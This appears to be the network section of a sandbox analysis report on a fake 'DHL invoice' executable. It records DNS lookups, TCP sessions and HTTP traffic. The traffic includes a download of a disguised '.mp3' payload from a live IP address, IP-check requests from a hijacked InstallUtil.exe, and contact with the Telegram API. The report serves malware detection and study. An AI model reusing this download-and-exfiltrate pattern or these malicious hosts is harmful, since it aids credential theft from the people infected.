Dec 20, 2024 10:22:42.346110106 CET	443	49739	104.21.67.152	192.168.2.4
Dec 20, 2024 10:22:42.787518024 CET	443	49739	104.21.67.152	192.168.2.4
Dec 20, 2024 10:22:42.787703991 CET	443	49739	104.21.67.152	192.168.2.4
Dec 20, 2024 10:22:42.787826061 CET	49739	443	192.168.2.4	104.21.67.152
Dec 20, 2024 10:22:42.788496017 CET	49739	443	192.168.2.4	104.21.67.152
Dec 20, 2024 10:22:42.791938066 CET	49737	80	192.168.2.4	132.226.247.73
Dec 20, 2024 10:22:42.793056965 CET	49740	80	192.168.2.4	132.226.247.73
Dec 20, 2024 10:22:42.911850929 CET	80	49737	132.226.247.73	192.168.2.4
Dec 20, 2024 10:22:42.912767887 CET	49737	80	192.168.2.4	132.226.247.73
Dec 20, 2024 10:22:42.913657904 CET	80	49740	132.226.247.73	192.168.2.4
Dec 20, 2024 10:22:42.918731928 CET	49740	80	192.168.2.4	132.226.247.73
Dec 20, 2024 10:22:42.918978930 CET	49740	80	192.168.2.4	132.226.247.73
Dec 20, 2024 10:22:43.038486958 CET	80	49740	132.226.247.73	192.168.2.4
Dec 20, 2024 10:22:44.222405910 CET	80	49740	132.226.247.73	192.168.2.4
Dec 20, 2024 10:22:44.223735094 CET	49741	443	192.168.2.4	104.21.67.152
Dec 20, 2024 10:22:44.223830938 CET	443	49741	104.21.67.152	192.168.2.4
Dec 20, 2024 10:22:44.223912001 CET	49741	443	192.168.2.4	104.21.67.152
Dec 20, 2024 10:22:44.224172115 CET	49741	443	192.168.2.4	104.21.67.152
Dec 20, 2024 10:22:44.224208117 CET	443	49741	104.21.67.152	192.168.2.4
Dec 20, 2024 10:22:44.264062881 CET	49740	80	192.168.2.4	132.226.247.73
Dec 20, 2024 10:22:45.440943956 CET	443	49741	104.21.67.152	192.168.2.4
Dec 20, 2024 10:22:45.446217060 CET	49741	443	192.168.2.4	104.21.67.152
Dec 20, 2024 10:22:45.446276903 CET	443	49741	104.21.67.152	192.168.2.4
Dec 20, 2024 10:22:46.271591902 CET	443	49741	104.21.67.152	192.168.2.4
Dec 20, 2024 10:22:46.271753073 CET	443	49741	104.21.67.152	192.168.2.4
Dec 20, 2024 10:22:46.272146940 CET	49741	443	192.168.2.4	104.21.67.152
Dec 20, 2024 10:22:46.272358894 CET	49741	443	192.168.2.4	104.21.67.152
Dec 20, 2024 10:22:46.283207893 CET	49742	80	192.168.2.4	132.226.247.73
Dec 20, 2024 10:22:46.402776003 CET	80	49742	132.226.247.73	192.168.2.4
Dec 20, 2024 10:22:46.402864933 CET	49742	80	192.168.2.4	132.226.247.73
Dec 20, 2024 10:22:46.403323889 CET	49742	80	192.168.2.4	132.226.247.73
Dec 20, 2024 10:22:46.522901058 CET	80	49742	132.226.247.73	192.168.2.4
Dec 20, 2024 10:22:47.707815886 CET	80	49742	132.226.247.73	192.168.2.4
Dec 20, 2024 10:22:47.710355997 CET	49743	443	192.168.2.4	104.21.67.152
Dec 20, 2024 10:22:47.710426092 CET	443	49743	104.21.67.152	192.168.2.4
Dec 20, 2024 10:22:47.710531950 CET	49743	443	192.168.2.4	104.21.67.152
Dec 20, 2024 10:22:47.710841894 CET	49743	443	192.168.2.4	104.21.67.152
Dec 20, 2024 10:22:47.710880041 CET	443	49743	104.21.67.152	192.168.2.4
Dec 20, 2024 10:22:47.764106035 CET	49742	80	192.168.2.4	132.226.247.73
Dec 20, 2024 10:22:48.927412033 CET	443	49743	104.21.67.152	192.168.2.4
Dec 20, 2024 10:22:48.931190014 CET	49743	443	192.168.2.4	104.21.67.152
Dec 20, 2024 10:22:48.931282997 CET	443	49743	104.21.67.152	192.168.2.4
Dec 20, 2024 10:22:49.373905897 CET	443	49743	104.21.67.152	192.168.2.4
Dec 20, 2024 10:22:49.374067068 CET	443	49743	104.21.67.152	192.168.2.4
Dec 20, 2024 10:22:49.374262094 CET	49743	443	192.168.2.4	104.21.67.152
Dec 20, 2024 10:22:49.374538898 CET	49743	443	192.168.2.4	104.21.67.152
Dec 20, 2024 10:22:49.377974987 CET	49742	80	192.168.2.4	132.226.247.73
Dec 20, 2024 10:22:49.379019022 CET	49744	80	192.168.2.4	132.226.247.73
Dec 20, 2024 10:22:49.498503923 CET	80	49742	132.226.247.73	192.168.2.4
Dec 20, 2024 10:22:49.498707056 CET	49742	80	192.168.2.4	132.226.247.73
Dec 20, 2024 10:22:49.499272108 CET	80	49744	132.226.247.73	192.168.2.4
Dec 20, 2024 10:22:49.499382019 CET	49744	80	192.168.2.4	132.226.247.73
Dec 20, 2024 10:22:49.499505997 CET	49744	80	192.168.2.4	132.226.247.73
Dec 20, 2024 10:22:49.619054079 CET	80	49744	132.226.247.73	192.168.2.4
Dec 20, 2024 10:22:50.804502010 CET	80	49744	132.226.247.73	192.168.2.4
Dec 20, 2024 10:22:50.806546926 CET	49745	443	192.168.2.4	104.21.67.152
Dec 20, 2024 10:22:50.806593895 CET	443	49745	104.21.67.152	192.168.2.4
Dec 20, 2024 10:22:50.806685925 CET	49745	443	192.168.2.4	104.21.67.152
Dec 20, 2024 10:22:50.807030916 CET	49745	443	192.168.2.4	104.21.67.152
Dec 20, 2024 10:22:50.807050943 CET	443	49745	104.21.67.152	192.168.2.4
Dec 20, 2024 10:22:50.857857943 CET	49744	80	192.168.2.4	132.226.247.73
Dec 20, 2024 10:22:52.024034023 CET	443	49745	104.21.67.152	192.168.2.4
Dec 20, 2024 10:22:52.025808096 CET	49745	443	192.168.2.4	104.21.67.152
Dec 20, 2024 10:22:52.025832891 CET	443	49745	104.21.67.152	192.168.2.4
Dec 20, 2024 10:22:52.468302965 CET	443	49745	104.21.67.152	192.168.2.4
Dec 20, 2024 10:22:52.470727921 CET	443	49745	104.21.67.152	192.168.2.4
Dec 20, 2024 10:22:52.470794916 CET	49745	443	192.168.2.4	104.21.67.152
Dec 20, 2024 10:22:52.471127033 CET	49745	443	192.168.2.4	104.21.67.152
Dec 20, 2024 10:22:52.475307941 CET	49744	80	192.168.2.4	132.226.247.73
Dec 20, 2024 10:22:52.476687908 CET	49746	80	192.168.2.4	132.226.247.73
Dec 20, 2024 10:22:52.595347881 CET	80	49744	132.226.247.73	192.168.2.4
Dec 20, 2024 10:22:52.595459938 CET	49744	80	192.168.2.4	132.226.247.73
Dec 20, 2024 10:22:52.596303940 CET	80	49746	132.226.247.73	192.168.2.4
Dec 20, 2024 10:22:52.596400976 CET	49746	80	192.168.2.4	132.226.247.73
Dec 20, 2024 10:22:52.596546888 CET	49746	80	192.168.2.4	132.226.247.73
Dec 20, 2024 10:22:52.716187000 CET	80	49746	132.226.247.73	192.168.2.4
Dec 20, 2024 10:22:53.901072025 CET	80	49746	132.226.247.73	192.168.2.4
Dec 20, 2024 10:22:53.902323008 CET	49747	443	192.168.2.4	104.21.67.152
Dec 20, 2024 10:22:53.902368069 CET	443	49747	104.21.67.152	192.168.2.4
Dec 20, 2024 10:22:53.902446985 CET	49747	443	192.168.2.4	104.21.67.152
Dec 20, 2024 10:22:53.902750969 CET	49747	443	192.168.2.4	104.21.67.152
Dec 20, 2024 10:22:53.902771950 CET	443	49747	104.21.67.152	192.168.2.4
Dec 20, 2024 10:22:53.951601028 CET	49746	80	192.168.2.4	132.226.247.73
Dec 20, 2024 10:22:55.122050047 CET	443	49747	104.21.67.152	192.168.2.4
Dec 20, 2024 10:22:55.139235020 CET	49747	443	192.168.2.4	104.21.67.152
Dec 20, 2024 10:22:55.139281034 CET	443	49747	104.21.67.152	192.168.2.4
Dec 20, 2024 10:22:55.571470976 CET	443	49747	104.21.67.152	192.168.2.4
Dec 20, 2024 10:22:55.571614027 CET	443	49747	104.21.67.152	192.168.2.4
Dec 20, 2024 10:22:55.574785948 CET	49747	443	192.168.2.4	104.21.67.152
Dec 20, 2024 10:22:55.575076103 CET	49747	443	192.168.2.4	104.21.67.152
Dec 20, 2024 10:22:55.643590927 CET	49746	80	192.168.2.4	132.226.247.73
Dec 20, 2024 10:22:55.648397923 CET	49748	80	192.168.2.4	132.226.247.73
Dec 20, 2024 10:22:55.763688087 CET	80	49746	132.226.247.73	192.168.2.4
Dec 20, 2024 10:22:55.764194965 CET	49746	80	192.168.2.4	132.226.247.73
Dec 20, 2024 10:22:55.768060923 CET	80	49748	132.226.247.73	192.168.2.4
Dec 20, 2024 10:22:55.768146038 CET	49748	80	192.168.2.4	132.226.247.73
Dec 20, 2024 10:22:55.768239021 CET	49748	80	192.168.2.4	132.226.247.73
Dec 20, 2024 10:22:55.887701988 CET	80	49748	132.226.247.73	192.168.2.4
Dec 20, 2024 10:22:57.092056990 CET	80	49748	132.226.247.73	192.168.2.4
Dec 20, 2024 10:22:57.093534946 CET	49749	443	192.168.2.4	104.21.67.152
Dec 20, 2024 10:22:57.093568087 CET	443	49749	104.21.67.152	192.168.2.4
Dec 20, 2024 10:22:57.093641043 CET	49749	443	192.168.2.4	104.21.67.152
Dec 20, 2024 10:22:57.093923092 CET	49749	443	192.168.2.4	104.21.67.152
Dec 20, 2024 10:22:57.093935966 CET	443	49749	104.21.67.152	192.168.2.4
Dec 20, 2024 10:22:57.139120102 CET	49748	80	192.168.2.4	132.226.247.73
Dec 20, 2024 10:22:58.311538935 CET	443	49749	104.21.67.152	192.168.2.4
Dec 20, 2024 10:22:58.313043118 CET	49749	443	192.168.2.4	104.21.67.152
Dec 20, 2024 10:22:58.313060045 CET	443	49749	104.21.67.152	192.168.2.4
Dec 20, 2024 10:22:58.755867958 CET	443	49749	104.21.67.152	192.168.2.4
Dec 20, 2024 10:22:58.756025076 CET	443	49749	104.21.67.152	192.168.2.4
Dec 20, 2024 10:22:58.756171942 CET	49749	443	192.168.2.4	104.21.67.152
Dec 20, 2024 10:22:58.756567001 CET	49749	443	192.168.2.4	104.21.67.152
Dec 20, 2024 10:22:58.759713888 CET	49748	80	192.168.2.4	132.226.247.73
Dec 20, 2024 10:22:58.760761023 CET	49751	80	192.168.2.4	132.226.247.73
Dec 20, 2024 10:22:58.879901886 CET	80	49748	132.226.247.73	192.168.2.4
Dec 20, 2024 10:22:58.879981995 CET	49748	80	192.168.2.4	132.226.247.73
Dec 20, 2024 10:22:58.880325079 CET	80	49751	132.226.247.73	192.168.2.4
Dec 20, 2024 10:22:58.880412102 CET	49751	80	192.168.2.4	132.226.247.73
Dec 20, 2024 10:22:58.880534887 CET	49751	80	192.168.2.4	132.226.247.73
Dec 20, 2024 10:22:59.000075102 CET	80	49751	132.226.247.73	192.168.2.4
Dec 20, 2024 10:23:00.183773041 CET	80	49751	132.226.247.73	192.168.2.4
Dec 20, 2024 10:23:00.184993982 CET	49753	443	192.168.2.4	104.21.67.152
Dec 20, 2024 10:23:00.185043097 CET	443	49753	104.21.67.152	192.168.2.4
Dec 20, 2024 10:23:00.185187101 CET	49753	443	192.168.2.4	104.21.67.152
Dec 20, 2024 10:23:00.185403109 CET	49753	443	192.168.2.4	104.21.67.152
Dec 20, 2024 10:23:00.185424089 CET	443	49753	104.21.67.152	192.168.2.4
Dec 20, 2024 10:23:00.232883930 CET	49751	80	192.168.2.4	132.226.247.73
Dec 20, 2024 10:23:01.401572943 CET	443	49753	104.21.67.152	192.168.2.4
Dec 20, 2024 10:23:01.403304100 CET	49753	443	192.168.2.4	104.21.67.152
Dec 20, 2024 10:23:01.403341055 CET	443	49753	104.21.67.152	192.168.2.4
Dec 20, 2024 10:23:01.872252941 CET	443	49753	104.21.67.152	192.168.2.4
Dec 20, 2024 10:23:01.872423887 CET	443	49753	104.21.67.152	192.168.2.4
Dec 20, 2024 10:23:01.872472048 CET	49753	443	192.168.2.4	104.21.67.152
Dec 20, 2024 10:23:01.872992039 CET	49753	443	192.168.2.4	104.21.67.152
Dec 20, 2024 10:23:07.011641979 CET	49751	80	192.168.2.4	132.226.247.73
Dec 20, 2024 10:23:07.136490107 CET	80	49751	132.226.247.73	192.168.2.4
Dec 20, 2024 10:23:07.136689901 CET	49751	80	192.168.2.4	132.226.247.73
Dec 20, 2024 10:23:07.166456938 CET	49769	443	192.168.2.4	149.154.167.220
Dec 20, 2024 10:23:07.166541100 CET	443	49769	149.154.167.220	192.168.2.4
Dec 20, 2024 10:23:07.166625023 CET	49769	443	192.168.2.4	149.154.167.220
Dec 20, 2024 10:23:07.167325020 CET	49769	443	192.168.2.4	149.154.167.220
Dec 20, 2024 10:23:07.167351007 CET	443	49769	149.154.167.220	192.168.2.4
Dec 20, 2024 10:23:08.545980930 CET	443	49769	149.154.167.220	192.168.2.4
Dec 20, 2024 10:23:08.546082020 CET	49769	443	192.168.2.4	149.154.167.220
Dec 20, 2024 10:23:08.547827005 CET	49769	443	192.168.2.4	149.154.167.220
Dec 20, 2024 10:23:08.547852993 CET	443	49769	149.154.167.220	192.168.2.4
Dec 20, 2024 10:23:08.548254013 CET	443	49769	149.154.167.220	192.168.2.4
Dec 20, 2024 10:23:08.549544096 CET	49769	443	192.168.2.4	149.154.167.220
Dec 20, 2024 10:23:08.591358900 CET	443	49769	149.154.167.220	192.168.2.4
Dec 20, 2024 10:23:08.592984915 CET	49769	443	192.168.2.4	149.154.167.220
Dec 20, 2024 10:23:08.593002081 CET	443	49769	149.154.167.220	192.168.2.4
Dec 20, 2024 10:23:09.381251097 CET	443	49769	149.154.167.220	192.168.2.4
Dec 20, 2024 10:23:09.381347895 CET	443	49769	149.154.167.220	192.168.2.4
Dec 20, 2024 10:23:09.381397963 CET	49769	443	192.168.2.4	149.154.167.220
Dec 20, 2024 10:23:09.381836891 CET	49769	443	192.168.2.4	149.154.167.220
Dec 20, 2024 10:23:49.223036051 CET	80	49740	132.226.247.73	192.168.2.4
Dec 20, 2024 10:23:49.223114014 CET	49740	80	192.168.2.4	132.226.247.73

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 20, 2024 10:22:36.788990974 CET	60995	53	192.168.2.4	1.1.1.1
Dec 20, 2024 10:22:36.926882982 CET	53	60995	1.1.1.1	192.168.2.4
Dec 20, 2024 10:22:38.827910900 CET	50934	53	192.168.2.4	1.1.1.1
Dec 20, 2024 10:22:38.976162910 CET	53	50934	1.1.1.1	192.168.2.4
Dec 20, 2024 10:23:07.012360096 CET	59141	53	192.168.2.4	1.1.1.1
Dec 20, 2024 10:23:07.165433884 CET	53	59141	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 20, 2024 10:22:36.788990974 CET	192.168.2.4	1.1.1.1	0x1bd3	Standard query (0)	checkip.dyndns.org	A (IP address)	IN (0x0001)	false
Dec 20, 2024 10:22:38.827910900 CET	192.168.2.4	1.1.1.1	0xf40e	Standard query (0)	reallyfreegeoip.org	A (IP address)	IN (0x0001)	false
Dec 20, 2024 10:23:07.012360096 CET	192.168.2.4	1.1.1.1	0xa43c	Standard query (0)	api.telegram.org	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Dec 20, 2024 10:22:36.926882982 CET	1.1.1.1	192.168.2.4	0x1bd3	No error (0)	checkip.dyndns.org	checkip.dyndns.com		CNAME (Canonical name)	IN (0x0001)	false
Dec 20, 2024 10:22:36.926882982 CET	1.1.1.1	192.168.2.4	0x1bd3	No error (0)	checkip.dyndns.com		132.226.247.73	A (IP address)	IN (0x0001)	false
Dec 20, 2024 10:22:36.926882982 CET	1.1.1.1	192.168.2.4	0x1bd3	No error (0)	checkip.dyndns.com		158.101.44.242	A (IP address)	IN (0x0001)	false
Dec 20, 2024 10:22:36.926882982 CET	1.1.1.1	192.168.2.4	0x1bd3	No error (0)	checkip.dyndns.com		193.122.6.168	A (IP address)	IN (0x0001)	false
Dec 20, 2024 10:22:36.926882982 CET	1.1.1.1	192.168.2.4	0x1bd3	No error (0)	checkip.dyndns.com		193.122.130.0	A (IP address)	IN (0x0001)	false
Dec 20, 2024 10:22:36.926882982 CET	1.1.1.1	192.168.2.4	0x1bd3	No error (0)	checkip.dyndns.com		132.226.8.169	A (IP address)	IN (0x0001)	false
Dec 20, 2024 10:22:38.976162910 CET	1.1.1.1	192.168.2.4	0xf40e	No error (0)	reallyfreegeoip.org		104.21.67.152	A (IP address)	IN (0x0001)	false
Dec 20, 2024 10:22:38.976162910 CET	1.1.1.1	192.168.2.4	0xf40e	No error (0)	reallyfreegeoip.org		172.67.177.134	A (IP address)	IN (0x0001)	false
Dec 20, 2024 10:23:07.165433884 CET	1.1.1.1	192.168.2.4	0xa43c	No error (0)	api.telegram.org		149.154.167.220	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

reallyfreegeoip.org

api.telegram.org

160.22.121.182

checkip.dyndns.org

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49730	160.22.121.182	80	6672	C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exe

Timestamp	Bytes transferred	Direction	Data
Dec 20, 2024 10:22:01.595963955 CET	83	OUT	GET /STATO/Vskhdvzxu.mp3 HTTP/1.1 Host: 160.22.121.182 Connection: Keep-Alive
Dec 20, 2024 10:22:03.186876059 CET	1236	IN	HTTP/1.1 200 OK Date: Fri, 20 Dec 2024 09:22:02 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 Last-Modified: Fri, 20 Dec 2024 01:44:41 GMT ETag: "ea408-629a9ca58f463" Accept-Ranges: bytes Content-Length: 959496 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: audio/mpeg Data Raw: 39 8f 3e 13 e8 86 6c d1 8e 07 c9 dd 28 79 e0 27 58 e1 86 5a c3 23 08 9a f2 33 f9 11 c0 12 af 8d 4c b3 e1 f0 fc b9 13 e6 fe 17 8d c7 75 bf 63 2e d3 0e 83 81 fc ee bf 50 4b d9 c3 47 bd c0 69 56 2c e7 cf 07 5e 57 24 98 58 53 ba cc 77 43 dd 2e 47 4e bb 35 58 a4 6e 62 51 d5 42 55 a8 b6 bf 7d c2 c0 78 1d 75 73 0b 3b d5 06 bf ef 75 73 c9 b5 2e 00 b5 f7 45 bc 78 67 df 60 80 64 5d b1 b9 13 5f a8 4c f6 71 9e 29 82 7b 1f 35 e0 82 5f f7 97 27 97 33 c0 11 c8 50 c0 75 3d e4 a1 2c 4b bb bf 75 3f 38 6a f2 cf 5c a7 32 f4 9d 96 74 9e 4e db 84 ff 57 11 2f fc 3b 5f 1d 89 6a d7 4e b3 3a 19 30 f7 3f c7 2e b8 7b b2 41 83 a6 36 6f 32 49 94 ed 6d fe 10 3e a0 c8 47 6c a0 13 a4 02 a7 33 f5 05 e6 d0 20 e1 09 cf b9 b6 a5 91 bf 18 05 2e 69 54 22 ef 07 0f 1c c9 e0 a9 f3 e9 2a 66 ee 0f 97 aa 5b 4a 3f 5c e2 d8 38 bf ec 97 96 d4 1f b1 33 1b f5 5b 01 39 a5 02 00 8d 7b 5d d2 de 36 fe 91 9a d5 d0 64 16 a5 5e b3 6e 30 6a 4b d2 37 4e a6 0c 40 88 9d df a9 61 8d 2c 88 11 91 f5 d5 b2 1a 44 ad 56 7e fa 77 54 99 3b c4 83 e0 21 f7 44 9d ad 56 [TRUNCATED] Data Ascii: 9>l(y'XZ#3Luc.PKGiV,^W$XSwC.GN5XnbQBU}xus;us.Exg`d]_Lq){5_'3Pu=,Ku?8j\2tNW/;_jN:0?.{A6o2Im>Gl3 .iT"f[J?\83[9{]6d^n0jK7N@a,DV~wT;!DV!}i<19cBk?KuED,tE&_JB{iM:7W1hi@qtQ+]Z=\|RRwUgKD(EhD3-ffAT!"4(?4,kR1BMSOmO\|8V}V_^$I^tVyi')`'-7a"#VU8:cr{S;Ntp)\{W\vD](-A)]dtM3h7qH[2HV\|"I,<.FCK74`)V#k8F\|JT'}9L@D.kJo)HHZ5pl#)PCBLd${]3WM(!5OK)~=43%`_9sM7%(s,h'97(&Vw].hdSuT7NOH} p2~>
Dec 20, 2024 10:22:03.186894894 CET	1236	IN	Data Raw: 6d ee 09 55 2a b3 84 6e 96 36 7a 81 ba 0a 05 10 76 b9 ec 9d 5b 26 ef 98 d9 cd 20 ac f1 89 7a 1a d3 90 da 97 88 93 58 0c 53 25 d0 75 d3 33 ec 64 b2 6d 65 e9 f1 2a 0d 78 b1 8b c0 93 56 96 1d 04 6f 4a 70 a7 8c e2 30 63 02 fe 7b 73 97 df 52 7b 50 84 Data Ascii: mUn6zv[& zXS%u3dmexVoJp0c{sR{P-8bO'`HA#]xKLzaoPGwnMl>Czmn7=d,gu0gbdN}9VhIicRy#+V"gBGkTTE\|F?,hiYG
Dec 20, 2024 10:22:03.186903954 CET	1236	IN	Data Raw: bd 7f b0 0b 92 f0 8c b4 a4 4c 48 2e 80 3a 42 95 1a b6 0f f5 6f 8d 89 dd 52 2c f1 f7 80 7e c3 04 97 88 5a aa 63 8b 2f 92 42 16 24 ab c1 2d d6 4f 29 8a bc d6 8d fb 27 25 6e 04 97 7f 22 ce 71 2a 79 36 a3 cb db b0 4a 24 0a ed 36 3f c4 cd 75 82 e5 0a Data Ascii: LH.:BoR,~Zc/B$-O)'%n"qy6J$6?u(up&v{CH*Gt#g1uQm>SXkTf'(e1/I+4?IO6w5?b.7:jR8-v4i=VFRPFy'O_
Dec 20, 2024 10:22:03.187035084 CET	1236	IN	Data Raw: 77 4d e7 a7 2b 25 89 4d f5 5a c1 c5 03 11 55 8f c9 2d 0e 22 32 f6 f9 5e 7c 1e b6 52 a5 53 65 ab 5e f4 a6 19 46 5d 66 8d de 23 24 18 71 be b1 18 ef dd 83 bd a5 5c 21 5d 41 1f 36 8a 2e 5a 83 69 7b b2 96 eb ef f7 a8 c3 cd da 15 79 f3 e3 57 9d e9 d5 Data Ascii: wM+%MZU-"2^\|RSe^F]f#$q\!]A6.Zi{yWz))47J:K}]dg7QHpGVRuKhz506x6NddS>@cgA2uXfAMk7hyAC(xFs3WI
Dec 20, 2024 10:22:03.187047005 CET	896	IN	Data Raw: 27 a6 58 b0 14 74 78 d8 d5 fb d9 f6 1d 55 5c 41 68 43 84 54 52 31 cd a4 98 7f 4a d9 5c 96 19 f9 4a 95 30 c2 26 dc 5f 18 cd b9 61 39 ca 27 f9 b1 af 32 b2 14 14 50 d9 31 83 65 16 2d 6a 0d df 50 a6 59 ae 25 b7 d3 c3 a4 22 96 1b 99 68 d8 60 41 55 23 Data Ascii: 'XtxU\AhCTR1J\J0&_a9'2P1e-jPY%"h`AU#C7}#R;4FiY{hIj\|Rq[E+7{Z]\|I%N;81tI6m~9dOO]GT AD"FpV=952)7?Lk'VM%6BK>M
Dec 20, 2024 10:22:03.439441919 CET	1236	IN	Data Raw: 72 71 2d 68 1e b5 6c 47 7f 85 d5 7d db 0f 66 14 66 a5 cf bb d9 ef 57 e5 ee 0c 15 a3 38 51 3a fc 0e 1f 43 0c 18 35 2d 81 c1 60 3d ca 39 b3 04 b8 d1 1a 2d b9 d1 74 50 86 6b 4f 87 b4 45 06 d9 88 7d 89 dc 0b 8c a1 2b 05 0b 8f aa d6 01 b7 0f 5b 7a 3a Data Ascii: rq-hlG}ffW8Q:C5-`=9-tPkOE}+[z:w!@8P5:_Cej@"`OlXk:qLna}+{S$z+,6%A@I\?mzc+3t"mpZDqWAi%r-
Dec 20, 2024 10:22:03.439508915 CET	1236	IN	Data Raw: b3 d3 3e 3a 09 79 e6 62 81 c2 f0 d8 12 bf 76 fd b8 bc 39 86 d1 0d 53 5c 7c 96 2a d4 52 b1 b9 91 87 cb 77 29 e2 44 40 b7 4c 54 4f e6 b3 44 c0 56 6e 01 6e 5e 56 2e 9c b9 d4 d5 68 09 23 c2 ee db 76 05 35 5c f0 d3 60 7b 26 d7 ae 06 42 ef 44 11 47 82 Data Ascii: >:ybv9S\\|Rw)D@LTODVnn^V.h#v5\`{&BDGcCJ& MWdbVT!5qP-dT-BG&L!p?.40m P]pil?ks4 =G'vG;LXh$]U {5@>C
Dec 20, 2024 10:22:03.439527035 CET	1236	IN	Data Raw: 46 f2 02 b8 dd 0e 07 b0 20 b8 55 4d 45 37 ef e4 68 9a 1f b3 60 5a 8d 3a 25 78 0d b3 83 f9 32 9e 47 e9 88 3a c2 3a 57 24 bd 4a 63 f8 2f 01 99 76 b1 ee a6 bd 4d e8 ac 75 d1 fa bd d5 bf 13 12 77 5f af 78 99 90 af b3 ff a0 95 e1 a6 a8 5d ab ed 5b c1 Data Ascii: F UME7h`Z:%x2G::W$Jc/vMuw_x][m~qqtn`~P9\]/-v)graU0]{BJQ\Zz'6CwaKHIRamuq#Bv}xO )s;`*>nVdDkR[4i
Dec 20, 2024 10:22:03.439599991 CET	1236	IN	Data Raw: 6f 09 2f 7a 8b 56 be 1f 6f 55 b1 a6 b6 e1 36 a7 a9 dd a3 c2 3c 8a 6a 7b bb e0 f4 e4 7d 59 db 61 97 e1 a7 d1 1e 72 44 f1 98 6d f6 b3 12 20 10 4d cd b7 b7 bb 0a 00 19 93 5b 02 70 1d 21 f5 3f 2d 8c cc 76 0e 5a b6 3c 7a e5 5b ba 54 b0 8f af 04 c6 1c Data Ascii: o/zVoU6<j{}YarDm M[p!?-vZ<z[T*^H/MYE?VSYp8hd4j~7}=%C.71LPf1M~P&B$<)ImK->f1aSLQumdvEw[`t c,#kDSPv4]9H#
Dec 20, 2024 10:22:03.559010983 CET	1236	IN	Data Raw: 5c 94 16 90 69 e7 c2 5d dc 37 75 d5 6e b8 f6 fe ed 7e 59 3f 8e 51 d7 4a 4a 70 ba 44 c7 e4 c7 9b a8 e4 a4 6a a7 43 3c d8 0b 83 f2 ee 08 fc 87 01 f3 09 6d 34 ec 03 46 19 60 0d a3 ce 29 de fa ab 67 9d d9 27 88 30 d6 14 fd 0e 95 ee d9 0f e7 f5 b7 2d Data Ascii: \i]7un~Y?QJJpDjC<m4F`)g'0-`H.e_HA'lF}.rbt.7(A6550Ac2&;%y7]Y-es:Hz">87* KGk ZNPLY7
Dec 20, 2024 10:22:03.559022903 CET	1236	IN	Data Raw: 2a 66 df 7c 3f 32 5d f0 db 08 d5 ce bc ec ae 2b e9 c4 a5 26 a1 51 c0 0f 36 ad e2 9f eb dc 85 43 c2 33 b8 ca c1 d2 58 b9 85 6f 56 db cd 26 07 49 2d ec 39 90 48 df 2b 61 27 eb f9 62 8c 93 6b 1c e6 75 85 18 8a c1 17 7b 3c b7 73 ef 7f 2c 4e 56 96 25 Data Ascii: f\|?2]+&Q6C3XoV&I-9H+a'bku{<s,NV%+zC}{QgsdTr\|C609@!O ;E80v8,bH-$+%{C?R>x34('b^k&0b_h

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49737	132.226.247.73	80	1432	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
Dec 20, 2024 10:22:37.054039001 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Dec 20, 2024 10:22:38.359555006 CET	321	IN	HTTP/1.1 200 OK Date: Fri, 20 Dec 2024 09:22:38 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: de49c2acf551fc8e4da8f883e80ea429 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Dec 20, 2024 10:22:38.364152908 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Dec 20, 2024 10:22:38.790900946 CET	321	IN	HTTP/1.1 200 OK Date: Fri, 20 Dec 2024 09:22:38 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 4ef0b1a99068a5c6769cd343bc07e990 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Dec 20, 2024 10:22:40.660377979 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
